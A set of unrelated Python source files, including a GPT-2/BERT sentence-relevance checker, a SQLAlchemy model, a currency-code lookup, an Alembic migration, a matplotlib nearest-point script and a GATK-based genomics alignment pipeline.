    packages=[
        'timecode',
        'timecode.test',
    ],
    # NOTE(review): 'license' should name the licence (e.g. "MIT"), not a
    # file name — confirm against LICENSE.txt.
    license='LICENSE.txt',
    install_requires=[
        "Django >= 1.5",
    ]
)
|
import torch
import os
import urllib
from transformers import ( BertConfig, BertForSequenceClassification, BertTokenizer,
GPT2Config, GPT2LMHeadModel, GPT2Tokenizer)
class TabooBasicRuler:
    """Sentence checker combining GPT-2 perplexity and a BERT pair classifier.

    ``check_available`` gates fluency via GPT-2 perplexity; ``check_relevance``
    scores whether a sentence plausibly follows the previous one using a
    fine-tuned BERT sequence classifier downloaded into ``~/.taboo_ckp``.
    """

    def __init__(self):
        # ppl ruler
        config_class, model_class, tokenizer_class = GPT2Config, GPT2LMHeadModel, GPT2Tokenizer
        config = config_class.from_pretrained("gpt2")
        self.tokenizer = tokenizer_class.from_pretrained("gpt2", do_lower_case=True)
        self.model = model_class.from_pretrained("gpt2", config=config)
        # next sentence
        _, model_class, tokenizer_class = BertConfig, BertForSequenceClassification, BertTokenizer
        self.bert_tokenizer = tokenizer_class.from_pretrained("bert-base-uncased")
        # NOTE(review): both checkpoint files are re-downloaded on every
        # instantiation even when already present, and HOME must be set —
        # consider caching.
        home_path = os.environ['HOME']
        if not os.path.exists(os.path.join(home_path, ".taboo_ckp")):
            os.makedirs(os.path.join(home_path, ".taboo_ckp"))
        # config.json
        url = 'https://thunlp.oss-cn-qingdao.aliyuncs.com/taboo/config.json'
        urllib.request.urlretrieve(url, os.path.join(home_path, ".taboo_ckp", "config.json"))
        # pytorch_model.bin
        url = 'https://thunlp.oss-cn-qingdao.aliyuncs.com/taboo/pytorch_model.bin'
        urllib.request.urlretrieve(url, os.path.join(home_path, ".taboo_ckp", "pytorch_model.bin"))
        self.bert_model = model_class.from_pretrained(os.path.join(home_path, ".taboo_ckp"))

    def check_relevance(self, sent, sentences):
        """Return True when ``sent`` is classified as relevant to the last
        sentence of ``sentences``.

        Builds a standard BERT sentence-pair input ([CLS] prev [SEP] sent
        [SEP]) padded to 512 tokens and compares the two classifier logits.
        """
        last_sentence = sentences[-1]
        # 254 + 254 tokens plus the 3 special tokens fit the 512-token input.
        block_size = 254
        y1 = self.bert_tokenizer.tokenize(last_sentence)[:block_size]
        y2 = self.bert_tokenizer.tokenize(sent)[:block_size]
        y = ["[CLS]"] + y1 + ["[SEP]"] + y2 + ["[SEP]"]
        y = self.bert_tokenizer.convert_tokens_to_ids(y)
        # Segment ids: 0 for the first sentence (+CLS/SEP), 1 for the second.
        types = [0] * (len(y1)+2) + [1] * (len(y2)+1)
        atten = [1] * len(y)
        pads = 512 - len(y)
        y = y + [0] * pads
        types = types + [0] * pads
        atten = atten + [0] * pads
        batch = [
            torch.LongTensor([y]),
            torch.LongTensor([atten]),
            torch.LongTensor([types]),
            torch.LongTensor([[0]])  # dummy label; only the logits are used
        ]
        with torch.no_grad():
            inputs = {'input_ids': batch[0],
                      'attention_mask': batch[1],
                      'token_type_ids': batch[2],
                      'labels': batch[3]}
            outputs = self.bert_model(**inputs)
            _, logits = outputs[:2]
        # Class 1 winning means "relevant".
        if logits[0][0] < logits[0][1]:
            return True
        else:
            return False

    def check_available(self, sent):
        """Return True when the GPT-2 perplexity of ``sent`` is below 50."""
        tokens = self.tokenizer.convert_tokens_to_ids(self.tokenizer.tokenize(sent))
        batch = torch.LongTensor([tokens])
        with torch.no_grad():
            outputs = self.model(batch, labels=batch)
            lm_loss = outputs[0]
        # ppl = torch.exp(lm_loss / len(tokens))
        # lm_loss is already the mean per-token NLL, so exp() is perplexity.
        ppl = torch.exp(lm_loss).item()
        if ppl < 50:
            return True
        else:
            return False
|
from argparse import ArgumentParser
import pytest
from espnet2.bin.enh_asr_train import get_parser
from espnet2.bin.enh_asr_train import main
def test_get_parser():
    """The training entry point must expose an argparse parser."""
    parser = get_parser()
    assert isinstance(parser, ArgumentParser)
def test_main():
    """Calling main() with no arguments must exit via SystemExit."""
    pytest.raises(SystemExit, main)
|
import types
from sqlalchemy import Column, String, BigInteger, Integer, DateTime, ForeignKey, Sequence, Table
import datetime
from models.BaseModel import BaseModel
#from models.FacilitiesRelated.RoomModel import RoomModel
# EventRoomModel = Table('events_rooms', BaseModel.metadata,
# Column('id', BigInteger, Sequence('all_id_seq'), primary_key=True),
# Column('room_id', ForeignKey('rooms.id'), primary_key=True),
# Column('event_id', ForeignKey('events.id'), primary_key=True)
# )
class EventRoomModel(BaseModel):
    """Association table linking events to the rooms they take place in."""

    __tablename__ = 'events_rooms'

    # Surrogate id drawn from the shared 'all_id_seq' sequence.
    id = Column(BigInteger, Sequence('all_id_seq'), primary_key=True)
    # One row per (room, event) pair; both columns are part of the PK.
    room_id = Column(ForeignKey('rooms.id'), primary_key=True)
    event_id = Column(ForeignKey('events.id'), primary_key=True)
|
class Currency:
    """A currency identified by its ISO 4217 code.

    ``repr()`` yields the symbol (or descriptive name) when the code is
    known, and the raw code otherwise.
    """

    def __init__(self, code: str):
        """Store the ISO 4217 currency code (e.g. "USD")."""
        self.__code = code

    def __repr__(self):
        # Bug fix: repr() must return a str, but retrieve_symbol() yields
        # None for unknown codes; fall back to the raw code.
        return self.retrieve_symbol() or self.code

    @property
    def code(self):
        """The ISO 4217 code this instance was created with."""
        return self.__code

    def retrieve_symbol(self):
        """Return the symbol/name for this code, or None when unknown."""
        return self._currency_codes(self.code)

    @staticmethod
    def _currency_codes(code: str = None):
        """Map an ISO 4217 code to its symbol or descriptive name.

        Most entries hold the English currency name; a few hold the actual
        symbol. Returns None for unrecognised codes.

        Bug fix: the keys "LAK:", "NOK:", "SPL:" and "SR:D" contained stray
        colons and could never match their ISO codes; corrected to "LAK",
        "NOK", "SPL" and "SRD".
        """
        codes = {"AED": u"\u062f"+ u"\u002e" + u"\u0625", "AFN": u"\u060B", "ALL": u"\u004C" + u"\u0065" + u"\u006B",
                 "AMD": u"\u058F", "ANG": "Netherlands Antilles Guilder", "AOA": "Angola Kwanza",
                 "ARS": "Argentina Peso", "AUD": "Australia Dollar", "AWG": "Aruba Guilder",
                 "AZN": "Azerbaijan New Manat", "BAM": "Bosnia and Herzegovina Convertible Marka",
                 "BBD": "Barbados Dollar", "BDT": "Bangladesh Taka", "BGN": "Bulgaria Lev", "BHD": "Bahrain Dinar",
                 "BIF": "Burundi Franc", "BMD": "Bermuda Dollar", "BND": "Brunei Darussalam Dollar",
                 "BOB": "Bolivia Bolíviano", "BRL": "Brazil Real", "BSD": "Bahamas Dollar",
                 "BTN": "Bhutan Ngultrum", "BWP": "Botswana Pula", "BYR": "Belarus Ruble", "BZD": "Belize Dollar",
                 "CAD": "Canada Dollar", "CDF": "Congo/Kinshasa Franc", "CHF": "Switzerland Franc",
                 "CLP": "Chile Peso", "CNY": "China Yuan Renminbi", "COP": "Colombia Peso",
                 "CRC": "Costa Rica Colon", "CUC": "Cuba Convertible Peso", "CUP": "Cuba Peso",
                 "CVE": "Cape Verde Escudo", "CZK": "Czech Republic Koruna", "DJF": "Djibouti Franc",
                 "DKK": "Denmark Krone", "DOP": "Dominican Republic Peso", "DZD": "Algeria Dinar",
                 "EGP": "Egypt Pound", "ERN": "Eritrea Nakfa", "ETB": "Ethiopia Birr",
                 "EUR": u"\u20ac", "FJD": "Fiji Dollar", "FKP": "Falkland Islands (Malvinas) Pound",
                 "GBP": u"\u00A3", "GEL": "Georgia Lari", "GGP": "Guernsey Pound",
                 "GHS": "Ghana Cedi", "GIP": "Gibraltar Pound", "GMD": "Gambia Dalasi", "GNF": "Guinea Franc",
                 "GTQ": "Guatemala Quetzal", "GYD": "Guyana Dollar", "HKD": "Hong Kong Dollar",
                 "HNL": "Honduras Lempira", "HRK": "Croatia Kuna", "HTG": "Haiti Gourde", "HUF": "Hungary Forint",
                 "IDR": "Indonesia Rupiah", "ILS": "Israel Shekel", "IMP": "Isle of Man Pound",
                 "INR": "India Rupee", "IQD": "Iraq Dinar", "IRR": "Iran Rial", "ISK": "Iceland Krona",
                 "JEP": "Jersey Pound", "JMD": "Jamaica Dollar", "JOD": "Jordan Dinar", "JPY": "Japan Yen",
                 "KES": "Kenya Shilling", "KGS": "Kyrgyzstan Som", "KHR": "Cambodia Riel", "KMF": "Comoros Franc",
                 "KPW": "Korea (North) Won", "KRW": "Korea (South) Won", "KWD": "Kuwait Dinar",
                 "KYD": "Cayman Islands Dollar", "KZT": "Kazakhstan Tenge", "LAK": "Laos Kip",
                 "LBP": "Lebanon Pound", "LKR": "Sri Lanka Rupee", "LRD": "Liberia Dollar", "LSL": "Lesotho Loti",
                 "LYD": "Libya Dinar", "MAD": "Morocco Dirham", "MDL": "Moldova Leu", "MGA": "Madagascar Ariary",
                 "MKD": "Macedonia Denar", "MMK": "Myanmar (Burma) Kyat", "MNT": "Mongolia Tughrik",
                 "MOP": "Macau Pataca", "MRO": "Mauritania Ouguiya", "MUR": "Mauritius Rupee",
                 "MVR": "Maldives (Maldive Islands) Rufiyaa", "MWK": "Malawi Kwacha", "MXN": "Mexico Peso",
                 "MYR": "Malaysia Ringgit", "MZN": "Mozambique Metical", "NAD": "Namibia Dollar",
                 "NGN": "Nigeria Naira", "NIO": "Nicaragua Cordoba", "NOK": "Norway Krone", "NPR": "Nepal Rupee",
                 "NZD": "New Zealand Dollar", "OMR": "Oman Rial", "PAB": "Panama Balboa", "PEN": "Peru Sol",
                 "PGK": "Papua New Guinea Kina", "PHP": "Philippines Peso", "PKR": "Pakistan Rupee",
                 "PLN": "Poland Zloty", "PYG": "Paraguay Guarani", "QAR": "Qatar Riyal", "RON": "Romania New Leu",
                 "RSD": "Serbia Dinar", "RUB": "Russia Ruble", "RWF": "Rwanda Franc", "SAR": "Saudi Arabia Riyal",
                 "SBD": "Solomon Islands Dollar", "SCR": "Seychelles Rupee", "SDG": "Sudan Pound",
                 "SEK": "Sweden Krona", "SGD": "Singapore Dollar", "SHP": "Saint Helena Pound",
                 "SLL": "Sierra Leone Leone", "SOS": "Somalia Shilling", "SPL": "Seborga Luigino",
                 "SRD": "Suriname Dollar", "STD": "São Tomé and Príncipe Dobra", "SVC": "El Salvador Colon",
                 "SYP": "Syria Pound", "SZL": "Swaziland Lilangeni", "THB": "Thailand Baht",
                 "TJS": "Tajikistan Somoni", "TMT": "Turkmenistan Manat", "TND": "Tunisia Dinar",
                 "TOP": "Tonga Pa'anga", "TRY": "Turkey Lira", "TTD": "Trinidad and Tobago Dollar",
                 "TVD": "Tuvalu Dollar", "TWD": "Taiwan New Dollar", "TZS": "Tanzania Shilling",
                 "UAH": "Ukraine Hryvnia", "UGX": "Uganda Shilling", "USD": u"\u0024",
                 "UYU": "Uruguay Peso", "UZS": "Uzbekistan Som", "VEF": "Venezuela Bolivar",
                 "VND": "Viet Nam Dong", "VUV": "Vanuatu Vatu", "WST": "Samoa Tala",
                 "XAF": "Communauté Financière Africaine (BEAC) CFA Franc BEAC", "XCD": "East Caribbean Dollar",
                 "XDR": "International Monetary Fund (IMF) Special Drawing Rights",
                 "XOF": "Communauté Financière Africaine (BCEAO) Franc",
                 "XPF": "Comptoirs Français du Pacifique (CFP) Franc", "YER": "Yemen Rial",
                 "ZAR": "South Africa Rand", "ZMW": "Zambia Kwacha", "ZWD": "Zimbabwe Dollar"}
        symbol = codes.get(code)
        return symbol
|
"""Add on-delete to FKs.
Revision ID: 5ba9cd4297ea
Revises: d8fa81723cf3
Create Date: 2021-11-03 14:28:43.001481
"""
from alembic import op
# revision identifiers, used by Alembic.
revision = "5ba9cd4297ea"
down_revision = "d8fa81723cf3"
branch_labels = None
depends_on = None
def upgrade():
    """Recreate both foreign keys with explicit ON DELETE behaviour.

    posts.rss_feed_id -> rss_feeds.id becomes ON DELETE CASCADE;
    rss_feeds.category_id -> categories.id becomes ON DELETE SET NULL.
    """
    op.drop_constraint("posts_rss_feed_id_fkey", "posts", type_="foreignkey")
    op.create_foreign_key(
        "posts_rss_feed_id_fkey",
        "posts",
        "rss_feeds",
        ["rss_feed_id"],
        ["id"],
        ondelete="CASCADE",
    )
    op.drop_constraint("rss_feeds_category_id_fkey", "rss_feeds",
                       type_='foreignkey')
    op.create_foreign_key(
        "rss_feeds_category_id_fkey",
        "rss_feeds",
        "categories",
        ["category_id"],
        ["id"],
        ondelete="SET NULL",
    )
def downgrade():
    """Restore both foreign keys without ON DELETE actions."""
    op.drop_constraint("rss_feeds_category_id_fkey", "rss_feeds",
                       type_="foreignkey")
    op.create_foreign_key(
        "rss_feeds_category_id_fkey",
        "rss_feeds",
        "categories",
        ["category_id"],
        ["id"],
    )
    op.drop_constraint("posts_rss_feed_id_fkey", "posts", type_="foreignkey")
    op.create_foreign_key(
        # Bug fix: a missing comma after the constraint name concatenated it
        # with "posts" (implicit string joining), shifting every positional
        # argument by one and breaking the downgrade.
        "posts_rss_feed_id_fkey",
        "posts",
        "rss_feeds",
        ["rss_feed_id"],
        ["id"],
    )
|
import random
import math
import matplotlib.pyplot as plt
import matplotlib.colors
import numpy as np
# Seed numpy's RNG for reproducibility.
# NOTE(review): the point coordinates below are drawn with the stdlib
# `random` module, which this numpy seed does NOT affect -- confirm intent.
np.random.seed(19680801)
N = 1000  # number of random points per grid row
fig, ax = plt.subplots()
dots = np.arange(N)  # NOTE(review): unused later in this script
# Here, Grid is not really useful (translated from the original French comment)
class Grid:
    """A size_y x size_x grid of random integers drawn from [0, N)."""

    def __init__(self, size_x, size_y):
        self.size_x = size_x
        self.size_y = size_y
        # Fill row by row; each cell is an independent random draw.
        self.grid = [
            [random.randrange(0, N) for _ in range(size_x)]
            for _ in range(size_y)
        ]

    def see(self):
        """Pretty-print the grid, one row per line, 4-char wide cells."""
        # https://stackoverflow.com/a/17871279
        rows = [''.join('{:4}'.format(cell) for cell in row) for row in self.grid]
        print('\n'.join(rows))

    def get(self):
        """Return the underlying list-of-rows."""
        return self.grid
# Two 1-row grids of N random integers each: `a` supplies the x values
# and `b` the y values of the scatter.
a = Grid(N,1)
b = Grid(N,1)
data = [a.get(), b.get()]
# NOTE(review): each .get() returns a list of rows ([[...]]); scatter
# receives the two row-lists positionally and colors points by the y rows.
ax.scatter(*data, c=data[1])
ax.plot(a.get(), b.get())
def onclick_bt1(event):
    """Print "TOUCHE" for every point within log(N) of the clicked spot.

    The log(N) tolerance is reasonable for N around 1000; it degrades when
    N is very small or much larger (translated from the original comment).
    """
    tol = math.log(N)
    click_x = round(event.xdata)
    click_y = round(event.ydata)
    for idx in range(N):
        near_x = abs(click_x - a.get()[0][idx]) <= tol
        near_y = abs(click_y - b.get()[0][idx]) <= tol
        if near_x and near_y:
            print("TOUCHE")
# Pair each x-row with the matching y-row; with 1-row grids this is a
# single (x_row, y_row) tuple.
points = list(zip(a.get(), b.get()))
# https://stackoverflow.com/a/60241070
def distance(a,b):
    """Euclidean distance between coordinate sequences *a* and *b*.

    zip() truncates to the shorter sequence, so trailing extra
    coordinates on either side are silently ignored.
    """
    squared_diffs = [(p - q) ** 2 for p, q in zip(a, b)]
    return sum(squared_diffs) ** 0.5
def onclick_bt2(event):
    """Print the second-smallest distance from the click to the point rows.

    NOTE(review): with single-row grids `points` holds one tuple, so at
    least two entries are needed for index 1 to exist -- confirm upstream.
    """
    dists = [distance([event.xdata, event.ydata], k) for k in points]
    # BUG FIX: the original did sorted(dists[0])[1], i.e. sorted() over a
    # single scalar distance, which raises TypeError. Per the original
    # comment ("second smallest element"), the intent is sorted(dists)[1].
    print(sorted(dists)[1])
def get_nearest_point_distance(point):
    """Distance from *point* to its nearest *other* grid point.

    Index 0 of the sorted distances is the point's own zero distance, so
    index 1 is the nearest neighbour (needs at least two points).
    """
    px, py = point[0], point[1]
    dists = [
        distance([px, py], [points[0][0][j], points[0][1][j]])
        for j in range(len(points[0][0]))
    ]
    return sorted(dists)[1]
# Very brute-force: for every pair (i, j), draw a segment whenever the
# distance i->j equals i's precomputed nearest-neighbour distance.
# NOTE(review): indentation was lost in this source; print("?3") is
# assumed to run once after the loops -- confirm against the original.
for i in range(0, N):
    #plt.plot(a.get()[i], b.get()[i])
    #print([a.get()[i][i], b.get()[i][i]])
    #print([a.get()[i][i+1], b.get()[i][i+1]])
    #print(distance([a.get()[i][i], b.get()[i][i]], [a.get()[i][i+1], b.get()[i][i+1]]))
    #print(get_nearest_point_distance([a.get()[i][i], b.get()[i][i]]))
    for j in range(0, N):
        #print(str(a.get()[i][j]) + " " + str(b.get()[i][j]))
        # print(distance([a.get()[i][j], b.get()[i][j]], [a.get()[i][j+1], b.get()[i][j+1]])) trial: this works (except an index problem at the end)
        #dists = [distance([a.get()[i][j], b.get()[i][j]],k) for k in points]
        #print([a.get()[i][j], b.get()[i][j]])
        #print([a.get()[i][j+1], b.get()[i][j+1]])
        #print(distance([a.get()[i][j], b.get()[i][j]], [a.get()[i][j+1], b.get()[i][j+1]]))
        #print(get_nearest_point_distance([a.get()[i][j], b.get()[i][j]])) # GNE
        #print("hello")
        if distance([a.get()[0][i], b.get()[0][i]], [a.get()[0][j], b.get()[0][j]]) == get_nearest_point_distance([a.get()[0][i], b.get()[0][i]]):
            plt.plot([a.get()[0][i], a.get()[0][j]], [b.get()[0][i], b.get()[0][j]])
            print("ON EN A TROUVE UN")
print("?3")
# Both handlers fire on every mouse click.
fig.canvas.mpl_connect('button_press_event', onclick_bt1)
fig.canvas.mpl_connect('button_press_event', onclick_bt2)
plt.show()
|
#// //#
#// _oo0oo_ //#
#// o8888888o //#
#// 88" . "88 //#
#// (| -_- |) //#
#// 0\ = /0 //#
#// ___/`---'\___ //#
#// .' \\| |// '. //#
#// / \\||| : |||// \ //#
#// / _||||| -:- |||||- \ //#
#// | | \\\ - /// | | //#
#// | \_| ''\---/'' |_/ | //#
#// \ .-\__ '-' ___/-. / //#
#// ___'. .' /--.--\ `. .'___ //#
#// ."" '< `.___\_<|>_/___.' >' "". //#
#// | | : `- \`.;`\ _ /`;.`/ - ` : | | //#
#/ \ \ `_. \_ __\ /__ _/ .-` / / //#
#// =====`-.____`.___ \_____/___.-`___.-'===== //#
#// `=---=' //#
#// //#
#// //#
#// ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ //#
#// //#
#// //#
import os,sys,time
import multiprocessing
import shutil
import subprocess
import pandas as pd
from pyper import *
import numpy as np
import math
from sklearn import preprocessing
from sklearn.decomposition import PCA
from matplotlib import pyplot as plt
from sklearn.semi_supervised import label_propagation
import itertools
from scipy import linalg
import matplotlib as mpl
from sklearn import mixture
from sklearn.preprocessing import StandardScaler
from sklearn.neural_network import MLPClassifier
from imblearn.under_sampling import RandomUnderSampler
from imblearn.metrics import classification_report_imbalanced
from Bio.Blast import NCBIXML
from Bio import pairwise2
from Bio.SubsMat import MatrixInfo as matlist
from math import log, exp
import pandas as pd
import math
import numpy as np
from scipy import interp
from sklearn.metrics import roc_curve, auc
from sklearn.model_selection import StratifiedKFold
import xgboost as xgb
from xgboost.sklearn import XGBClassifier
from sklearn import cross_validation, metrics
from sklearn.grid_search import GridSearchCV
import matplotlib.pylab as plt
from sklearn.model_selection import train_test_split
from Bio.Blast import NCBIXML
from Bio import pairwise2
from Bio.SubsMat import MatrixInfo as matlist
from math import log, exp
import subprocess
from sklearn.ensemble import RandomForestClassifier
from sklearn.preprocessing import StandardScaler
from imblearn.over_sampling import SMOTE
from collections import Counter
from sklearn.cross_validation import cross_val_score
# Model parameters.
# NOTE(review): `a` and `k` look like fitted constants of a downstream
# scoring model whose use is outside this chunk -- confirm against the
# original publication before changing.
a=26
k=4.86936
M=1. #default concentration of mutant peptides
W=1. #default concentration of wildtype peptides
WEPS=0.0003  # small epsilon; exact role not visible in this chunk -- TODO confirm
HYDROPHOBIC_RESIDUES="AILMFWYV"  # one-letter codes treated as hydrophobic
WEIRD_RESIDUES="CGP"  # cysteine/glycine/proline; usage not visible here
# Kyte-Doolittle hydropathy index keyed by one-letter amino-acid code.
hydro_score={"A":1.8,"C":2.5,"D":-3.5,"E":-3.5,"F":2.8,"G":-0.4,"H":-3.2,"I":4.5,"K":-3.9,"L":3.8,"M":1.9,"N":-3.5,"P":-1.6,"Q":-3.5,"R":-4.5,"S":-0.8,"T":-0.7,"V":4.2,"W":-0.9,"Y":-1.3}
def get_iedb_seq(iedb_file):
    """Return the non-header lines of a FASTA-style IEDB file, stripped.

    Lines beginning with ">" (FASTA headers) are skipped; every other
    line is whitespace-stripped and collected in file order.
    """
    iedb_seq = []
    with open(iedb_file) as handle:
        for raw_line in handle:
            if raw_line.startswith(">"):
                continue
            iedb_seq.append(raw_line.strip())
    return iedb_seq
def read_trimmomatic(raw_fastq_path_first,raw_fastq_path_second,trimmomatic_path,adapter_path,fastq_prefix,logfile_fold,fastq_type,CPU):
    """Run Trimmomatic paired-end adapter/quality trimming via the shell.

    Builds one `java -jar trimmomatic PE` command (phred33, ILLUMINACLIP
    plus LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15), prints it, and runs it
    with os.system; stdout/stderr are redirected to
    <logfile_fold>/<fastq_type>_trimmomatic.log.
    NOTE(review): the os.system exit status is ignored.
    """
    cmd_trimmomatic="java -jar " + trimmomatic_path + " PE -phred33 -threads " + str(CPU) + ' ' + raw_fastq_path_first + ' ' + raw_fastq_path_second + ' -baseout ' + fastq_prefix + " ILLUMINACLIP:" + adapter_path + ':2:30:10' + ' LEADING:3 TRAILING:3 SLIDINGWINDOW:4:15 > ' + logfile_fold + '/' + fastq_type + '_trimmomatic.log' + ' 2>&1'
    print cmd_trimmomatic
    os.system(cmd_trimmomatic)
def hlatyping(raw_fastq_path_first,raw_fastq_path_second,opitype_fold,opitype_out_fold,opitype_ext,prefix):
    """HLA typing with OptiType on paired-end DNA reads.

    Runs OptiType, locates its run directory inside opitype_out_fold, then
    runs the extraction helper script on <run>/<run>_result.tsv.
    """
    cmd_hla = 'python ' + opitype_fold + ' -i ' + raw_fastq_path_first + ' ' + raw_fastq_path_second + ' --dna -o ' + opitype_out_fold
    print cmd_hla
    os.system(cmd_hla)
    # NOTE(review): os.listdir order is arbitrary; taking [0] is only
    # correct when the output folder holds exactly one run directory.
    result_dir=os.listdir(opitype_out_fold)
    print result_dir[0]
    hla_result_path=opitype_out_fold+'/'+result_dir[0]+'/'+result_dir[0]+'_result.tsv'
    print hla_result_path
    cmd_hla_ext = 'python ' + opitype_ext + ' -i ' + hla_result_path + ' -o ' + opitype_out_fold + ' -s ' + prefix
    print cmd_hla_ext
    os.system(cmd_hla_ext)
    print 'hla type process done.'
def mapping_qc_gatk_preprocess(fastq_1_path,fastq_2_path,fastq_type,CPU,BWA_INDEX,GENOME,alignment_out_fold,prefix,REFERENCE,bwa_path,samtools_path,java_picard_path,GATK_path,dbsnp138,OneKG,mills,logfile_fold,bamstat_out_fold):
    """Align a paired-end sample and run the GATK3 pre-processing chain.

    Stages (every command is printed, then executed with os.system):
      1. bwa mem -> SAM -> BAM -> sorted+indexed BAM.
      2. Keep only chr1-22/X/Y reads.
      3. Picard MarkDuplicates, AddOrReplaceReadGroups, BuildBamIndex.
      4. GATK indel realignment (RealignerTargetCreator / IndelRealigner).
      5. GATK base recalibration (BaseRecalibrator / PrintReads), producing
         <alignment_out_fold>/<prefix>_<fastq_type>_recal.bam.

    NOTE(review): os.system exit codes are ignored, so a failing stage does
    not stop the pipeline; bamstat_out_fold is unused (edwBamStats is
    commented out).
    """
    # Stage 1-2: alignment, sorting, indexing, chromosome filtering.
    cmd_bwa=bwa_path + ' mem -t '+ str(CPU) + ' ' + BWA_INDEX + '/' + GENOME + ' ' + fastq_1_path + ' ' +fastq_2_path + ' > ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.sam'
    cmd_samtools_1=samtools_path + ' view -bhS -@ '+ str(CPU) + ' ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.sam' + ' > ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.bam'
    cmd_samtools_sort=samtools_path + ' sort -@ ' + str(CPU) + ' -m 2G ' + alignment_out_fold+'/'+'tmp_'+ prefix +'_'+fastq_type+'.bam' + ' ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_unfilter'
    cmd_samtools_index_1=samtools_path + ' index ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_unfilter.bam'
    cmd_select_chr=samtools_path + ' view -b -@ ' + str(CPU) + ' ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_unfilter.bam' + ' chr1 chr2 chr3 chr4 chr5 chr6 chr7 chr8 chr9 chr10 chr11 chr12 chr13 chr14 chr15 chr16 chr17 chr18 chr19 chr20 chr21 chr22 chrX chrY > ' + alignment_out_fold+'/' + prefix + '_'+fastq_type+'.bam'
    cmd_samtools_2=samtools_path + ' index ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.bam'
    # Stage 3: duplicate marking and read-group setup (Picard).
    cmd_picard="java -Xmx4G -jar " + java_picard_path + ' MarkDuplicates INPUT=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.bam' + ' OUTPUT=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter.bam' + ' METRICS_FILE=' + alignment_out_fold+'/'+prefix + '_'+fastq_type+'_dup_qc.txt ASSUME_SORTED=true VALIDATION_STRINGENCY=SILENT > ' + logfile_fold + '/' + fastq_type + '_markdup.log' + ' 2>&1'
    cmd_samtools_index_2=samtools_path + ' index ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter.bam'
    cmd_add_readgroup="java -Xmx4G -jar " + java_picard_path + ' AddOrReplaceReadGroups I=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter.bam' + ' O=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' SO=coordinate VALIDATION_STRINGENCY=SILENT RGID=' + fastq_type + ' RGLB=' + fastq_type + ' RGPL=illumina RGSM='+ fastq_type + ' RGPU=NextSeq > ' + logfile_fold + '/' + fastq_type + '_addreadgroup.log' + ' 2>&1'
    cmd_buildbamindex="java -Xmx4G -jar " + java_picard_path + ' BuildBamIndex I=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' O=' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam.bai' + ' VALIDATION_STRINGENCY=SILENT > ' + logfile_fold + '/' + fastq_type + '_buildindex.log' + ' 2>&1'
    # Stage 4-5: GATK realignment and base-quality recalibration.
    cmd_RealignerTargetCreator="java -Xmx4G -jar " + GATK_path + ' -T RealignerTargetCreator -nt '+ str(CPU) + ' -dt NONE -R ' + REFERENCE + ' -I '+ alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' -known ' + OneKG + ' -known ' + mills + ' -filterRNC -o ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.intervals > ' + logfile_fold + '/' + fastq_type + '_RealignerTargetCreator.log' + ' 2>&1'
    cmd_IndelRealigner="java -Xmx4G -jar " + GATK_path + ' -T IndelRealigner -R ' + REFERENCE + ' -I ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add.bam' + ' -known ' + OneKG + ' -known ' + mills + ' -targetIntervals ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.intervals' + ' -filterRNC -o ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add_realign.bam > ' + logfile_fold + '/' + fastq_type + '_IndelRealigner.log' + ' 2>&1'
    cmd_BaseRecalibrator="java -Xmx4G -jar " + GATK_path + ' -T BaseRecalibrator -nct ' + str(CPU) + ' -R ' + REFERENCE + ' -I ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add_realign.bam' + ' -knownSites ' + OneKG + ' -knownSites ' + mills + ' -knownSites ' + dbsnp138 + ' -o ' + alignment_out_fold + '/' + prefix + '_'+fastq_type + '.table > ' + logfile_fold + '/' + fastq_type + '_BaseRecalibrator.log' + ' 2>&1'
    cmd_PrintReads="java -Xmx4G -jar " + GATK_path + ' -T PrintReads -nct 8 -dt NONE -R ' + REFERENCE + ' -I ' + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'_mkdup_filter_add_realign.bam' + ' -BQSR ' + alignment_out_fold + '/' + prefix + '_'+fastq_type + '.table' + ' -o ' + alignment_out_fold + '/' + prefix + '_'+fastq_type + '_recal.bam > ' + logfile_fold + '/' + fastq_type + '_PrintRead.log' + ' 2>&1'
    #cmd_edwBamStats="edwBamStats " + alignment_out_fold+'/'+ prefix + '_'+fastq_type+'.bam' bamstat_out_fold + '/' + prefix + fastq_type +'_edwBamStats.txt'
    # Execute the stages sequentially, echoing each command first.
    print cmd_bwa
    os.system(cmd_bwa)
    print cmd_samtools_1
    os.system(cmd_samtools_1)
    print cmd_samtools_sort
    os.system(cmd_samtools_sort)
    print cmd_samtools_index_1
    os.system(cmd_samtools_index_1)
    print cmd_select_chr
    os.system(cmd_select_chr)
    print cmd_samtools_2
    os.system(cmd_samtools_2)
    print cmd_picard
    os.system(cmd_picard)
    print cmd_samtools_index_2
    os.system(cmd_samtools_index_2)
    print cmd_add_readgroup
    os.system(cmd_add_readgroup)
    print cmd_buildbamindex
    os.system(cmd_buildbamindex)
    print cmd_RealignerTargetCreator
    os.system(cmd_RealignerTargetCreator)
    print cmd_IndelRealigner
    os.system(cmd_IndelRealigner)
    print cmd_BaseRecalibrator
    os.system(cmd_BaseRecalibrator)
    print cmd_PrintReads
    os.system(cmd_PrintReads)
